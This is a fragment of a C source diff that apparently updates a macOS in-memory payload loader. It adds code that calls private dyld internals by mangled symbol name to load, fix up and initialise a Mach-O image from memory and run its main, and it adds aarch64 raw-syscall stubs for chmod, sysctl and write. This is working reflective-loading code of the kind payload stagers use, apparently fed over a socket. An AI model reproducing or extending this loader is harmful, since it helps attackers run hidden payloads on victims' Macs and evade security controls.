+        printf("JITLMP: %lld\n", JustInTimeLoaderMake_func);
+        void * topLoader = JustInTimeLoaderMake_func(apis, (void *)loadAddress, "", fileid, 0, false, true, false, 0, 0);
+        printf("TopLoader: %lld\n", topLoader);
+        printf("Toploader (*(int*)this): %i\n", *(int *)topLoader);
+        printf("Loaded Size: %lld\n", loaded->size);
+        printf("Loaded Capacity: %lld\n", loaded->capacity);
+        struct PartialLoader * pl = (struct PartialLoader *)topLoader;
+        printf("LoadAddress: %lld\n", pl->mappedAddress);
+        printf("lateLeaveMapped: %lld\n", pl->lateLeaveMapped);
+        printf("hidden: %lld\n", pl->hidden);
+        printf("Magic: %lld\n", pl->magic);
+        printf("IsPrebuilt: %lld\n", pl->isPrebuilt);
+        pl->lateLeaveMapped = 1;
+        pl = (struct PartialLoader *)topLoader;
+        printf("lateLeaveMapped: %lld\n", pl->lateLeaveMapped);
+        struct LoadChain * loadChainMain = (struct LoadChain *)(fileid+sizeof(struct FileID));// = { 0, *(void **)(apis+24) };
+        loadChainMain->previous = 0;
+        loadChainMain->image = *(void **)(apis+24);
+        printf("mainExecutableLoader: %lld\n", *(void **)(apis+24));
+        printf("mainExecutableLoader: %lld\n", loadChainMain->image);
+        struct LoadChain * loadChainCaller = (struct LoadChain *)(loadChainMain+sizeof(struct LoadChain));// = { &loadChainMain, &(loaded->elements[0]) };
+        loadChainCaller->previous = &loadChainMain;
+        loadChainCaller->image = &(loaded->elements[0]);
+        printf("LoadedElements: %lld\n", &(loaded->elements[0]));
+        printf("Toploader (*(int*)this): %i\n", *(int *)topLoader);
+        struct LoadChain * loadChain = (struct LoadChain *)(loadChainCaller+sizeof(struct LoadChain));// = { &loadChainCaller, topLoader };
+        loadChain->previous = &loadChainCaller;
+        loadChain->image = topLoader;
+        struct LoadOptions * depOptions = (struct LoadOptions *)(loadChain+sizeof(struct LoadChain));
+        depOptions->staticLinkage    = false;
+        depOptions->rtldLocal        = false; // RTLD_LOCAL only effects top level dylib
+        depOptions->rtldNoDelete     = true;
+        depOptions->canBeDylib       = true;
+        depOptions->rpathStack       = loadChain;
+        depOptions->useFallBackPaths = true;
+        LoadDependents_ptr LoadDependents_func = find_symbol(sdyld, "__ZN5dyld46Loader14loadDependentsER11DiagnosticsRNS_12RuntimeStateERKNS0_11LoadOptionsE", offset2);
+        struct diagnostics * diag = (struct diagnostics *)(depOptions+sizeof(struct LoadOptions));
+        diag->_buffer = 0;
+        LoadDependents_func(topLoader, diag, apis, depOptions);
+        if (diag->_buffer != 0) {
+          print("Error\n");
+        };
+        printf("buffer: %lld\n", diag->_buffer);
+        printf("startLoaderCount: %lld\n", startLoaderCount);
+        uint64_t newLoadersCount = loaded->size - startLoaderCount;
+        printf("newLoadersCount: %lld\n", newLoadersCount);
+        void * * newLoaders = &loaded->elements[startLoaderCount];
+        struct ArrayOfLoaderPointers newLoadersArray = { newLoaders, newLoadersCount, newLoadersCount };
+        if (newLoadersCount != 0) {
+          NotifyDebuggerLoad_ptr NotifyDebuggerLoad_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState18notifyDebuggerLoadERKN5dyld35ArrayIPKNS_6LoaderEEE", offset2);
+          NotifyDebuggerLoad_func(apis, &newLoadersArray);
+          if (*(char *)(apis + 0x7f) != '\0') {
+            AddWeakDefs_ptr AddWeakDefs_func = find_symbol(sdyld, "__ZN5dyld46Loader16addWeakDefsToMapERNS_12RuntimeStateERKN5dyld35ArrayIPKS0_EE", offset2);
+            AddWeakDefs_func(apis, &newLoadersArray);
+            print("WeakRefed\n");
+          }
+          ApplyFixups_ptr ApplyFixups_func = find_symbol(sdyld, "__ZNK5dyld46Loader11applyFixupsER11DiagnosticsRNS_12RuntimeStateERNS_34DyldCacheDataConstLazyScopedWriterEb", offset2);
+          struct DyldCacheDataConstLazyScopedWriter dcdclsw = { apis, false };
+          for (int i = 0; i != newLoadersCount; ++i) {
+            print("Fixing Up!\n");
+            void * ldr = newLoaders[i];
+            printf("Ldr: %lld\n", ldr);
+            ApplyFixups_func(ldr, diag, apis, &dcdclsw, true);
+            printf("Diag: %lld\n", diag->_buffer);
+          }
+          // TODO: Figure out if we need addPermanentRanges.
+          NotifyDtrace_ptr NotifyDtrace_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState12notifyDtraceERKN5dyld35ArrayIPKNS_6LoaderEEE", offset2);
+          NotifyDtrace_func(apis, &newLoadersArray);
+          RebindMissingFlatLazySymbols_ptr RebindMissingFlatLazySymbols_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState28rebindMissingFlatLazySymbolsERKN5dyld35ArrayIPKNS_6LoaderEEE", offset2);
+          RebindMissingFlatLazySymbols_func(apis, &newLoadersArray);
+          for (int i = 0; i != newLoadersCount; ++i) {
+            void * ldr = newLoaders[i];
+            print("Setting up locals.\n");
+            GetMA_ptr GetMA_func = find_symbol(sdyld, "__ZNK5dyld46Loader11loadAddressERNS_12RuntimeStateE", offset2);
+            const void* * ma = GetMA_func(ldr, apis);
+            HasThreadLocalVariables_ptr HasThreadLocalVariables_func = find_symbol(sdyld, "__ZNK5dyld39MachOFile23hasThreadLocalVariablesEv", offset2);
+            if (HasThreadLocalVariables_func(ma) == true) {
+              print("Has local variables.\n");
+              SetUpTLVs_ptr SetUpTLVs_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState9setUpTLVsEPKN5dyld313MachOAnalyzerE", offset2);
+              SetUpTLVs_func(apis, ma);
+            }
+          };
+        }
+        IncDlRefCount_ptr IncDlRefCount_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState13incDlRefCountEPKNS_6LoaderE", offset2);
+        IncDlRefCount_func(apis, topLoader);
+        print("Notifying.\n");
+        NotifyLoad_ptr NotifyLoad_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState10notifyLoadERKN5dyld35ArrayIPKNS_6LoaderEEE", offset2);
+        NotifyLoad_func(apis, &newLoadersArray);
+        print("Initializing\n");
+        RunInitializers_ptr RunInitializers_func = find_symbol(sdyld, "__ZNK5dyld46Loader38runInitializersBottomUpPlusUpwardLinksERNS_12RuntimeStateE", offset2);
+        RunInitializers_func(topLoader, apis);
+        *rtopLoader = (uint64_t)topLoader;
+      });
+    }
     uintptr_t flags = 0;
-    void* handle = (void*)((((uintptr_t)*rtopLoader) << 1) | flags);
-#ifdef DEBUG
-    SimpleDPrintf_func(1, "Handle: %lld\n", handle);
-#endif
-    VMDeallocate_ptr VMDeallocate_func = find_symbol(sdyld, "_vm_deallocate", sdyld);
+    void* handle = 0;
+    if (ventura) {
+      HandleFromLoader_ptr HandleFromLoader_func = find_symbol(sdyld, "__ZN5dyld4L16handleFromLoaderEPKNS_6LoaderEb", offset2);
+      handle = HandleFromLoader_func((void *)*rtopLoader, false);
+    } else {
+      handle = (void*)((((uintptr_t)*rtopLoader) << 1) | flags);
+    }
+    printf("Handle: %lld\n", handle);
+    VMDeallocate_ptr VMDeallocate_func = find_symbol(sdyld, "_vm_deallocate", offset2);
     VMDeallocate_func(mach_task_self, (void *)structspace, structspacesize);
-#ifdef DEBUG
-    SimpleDPrintf_func(1, "VMDeallocated: %lld\n", structspace);
-#endif
+    printf("VMDeallocated: %lld\n", structspace);
     NSModule nm = handle;
     NSLookupSymbolInModule_ptr NSLookupSymbolInModule_func = find_symbol(dyld, "_NSLookupSymbolInModule", offset);
     NSSymbol sym_main = NSLookupSymbolInModule_func(nm, "_main");
-#ifdef DEBUG
-    SimpleDPrintf_func(1, "sym_main: %lld\n", sym_main);
-#endif
+    printf("sym_main: %lld\n", sym_main);
     NSAddressOfSymbol_ptr NSAddressOfSymbol_func = find_symbol(dyld, "_NSAddressOfSymbol", offset);
     addr_main = NSAddressOfSymbol_func(sym_main);
   } else {
@@ -683,20 +771,14 @@ int main(int argc, char** argv)
     if (NSCreateObjectFileImageFromMemory_func((void*)buffer, buffer_size, &fi) != 1) {
       return 1;
     }
-#ifdef DEBUG
     print("created!\n");
-#endif
 
     NSModule nm = NSLinkModule_func(fi, "", NSLINKMODULE_OPTION_PRIVATE | NSLINKMODULE_OPTION_BINDNOW | NSLINKMODULE_OPTION_RETURN_ON_ERROR);
     if (!nm) {
-#ifdef DEBUG
       print("no nm!\n");
-#endif
       return 1;
     }
-#ifdef DEBUG
     print("good nm!\n");
-#endif
 
     NSSymbol sym_main = NSLookupSymbolInModule_func(nm, "_main");
     if (!sym_main) {
@@ -708,9 +790,7 @@ int main(int argc, char** argv)
       return 1;
     }
 
-#ifdef DEBUG
     print("found main!\n");
-#endif
   };
   int(*main_func)(int, char**) = (int(*)(int, char**))addr_main;
   char* socket = (char*)(size_t)argc;
@@ -773,6 +853,17 @@ uint64_t syscall_chmod(uint64_t path, long mode)
 {
   uint64_t chmod_no = 0x200000f;
   uint64_t ret = 0;
+#ifdef __aarch64__
+  __asm__(
+      "mov x16, %1;\n"
+      "mov x0, %2;\n"
+      "mov x1, %3;\n"
+      "svc #0;\n"
+      "mov %0, x0;\n"
+      : "=r"(ret)
+      : "r"(chmod_no), "r"(path), "r"(mode)
+      :);
+#else
   __asm__(
       "movq %1, %%rax;\n"
       "movq %2, %%rdi;\n"
@@ -782,6 +873,7 @@ uint64_t syscall_chmod(uint64_t path, long mode)
       : "=g"(ret)
       : "g"(chmod_no), "S"(path), "g"(mode)
       :);
+#endif
   return ret;
 }
 
@@ -843,6 +935,21 @@ int detect_sierra()
   uint64_t valsizeptr = (uint64_t)&size;
   uint64_t ret = 0;
 
+#ifdef __aarch64__
+  __asm__(
+      "mov x16, %1;\n"
+      "mov x0, %2;\n"
+      "mov x1, %3;\n"
+      "mov x2, %4;\n"
+      "mov x3, %5;\n"
+      "eor x4, x4, x4;\n"
+      "eor x5, x5, x5;\n"
+      "svc #0;\n"
+      "mov %0, x0;\n"
+      : "=r"(ret)
+      : "r"(sc_sysctl), "r"(nameptr), "r"(namelen), "r"(valptr), "r"(valsizeptr)
+      : );
+#else
   __asm__(
       "mov %1, %%rax;\n"
       "mov %2, %%rdi;\n"
@@ -856,6 +963,7 @@ int detect_sierra()
       : "=g"(ret)
       : "g"(sc_sysctl), "g"(nameptr), "g"(namelen), "g"(valptr), "g"(valsizeptr)
       : );
+#endif
 
   // osrelease is 16.x.x on Sierra
   if (ret == 0 && size > 2) {
@@ -874,6 +982,16 @@ uint64_t syscall_shared_region_check_np()
   long shared_region_check_np = 0x2000126; // #294
   uint64_t address = 0;
   unsigned long ret = 0;
+#ifdef __aarch64__
+  __asm__(
+      "mov x16, %1;\n"
+      "mov x0, %2;\n"
+      "svc #0;\n"
+      "mov %0, x0;\n"
+      : "=r"(ret)
+      : "r"(shared_region_check_np), "r"(&address)
+      : "x16", "x0" );
+#else
   __asm__(
       "movq %1, %%rax;\n"
       "movq %2, %%rdi;\n"
@@ -882,6 +1000,7 @@ uint64_t syscall_shared_region_check_np()
       : "=g"(ret)
       : "g"(shared_region_check_np), "g"(&address)
       : "rax", "rdi" );
+#endif
   return address;
 }
 
@@ -916,6 +1035,18 @@ void print(char * str)
   unsigned long long addr = (unsigned long long) str;
   unsigned long ret = 0;
   /* ret = write(stdout, str, len); */
+#ifdef __aarch64__
+  __asm__(
+      "mov x16, %1;\n"
+      "mov x0, %2;\n"
+      "mov x1, %3;\n"
+      "mov x2, %4;\n"
+      "svc #0;\n"
+      "mov %0, x0;\n"
+      : "=r"(ret)
+      : "r"(write), "r"(stdout), "r"(addr), "r"(len)
+      : "x0", "x1", "x2" );
+#else
   __asm__(
       "movq %1, %%rax;\n"
       "movq %2, %%rdi;\n"
@@ -926,5 +1057,6 @@ void print(char * str)
       : "=g"(ret)
       : "g"(write), "g"(stdout), "S"(addr), "g"(len)
       : "rax", "rdi", "rdx" );
+#endif
 }
 #endif
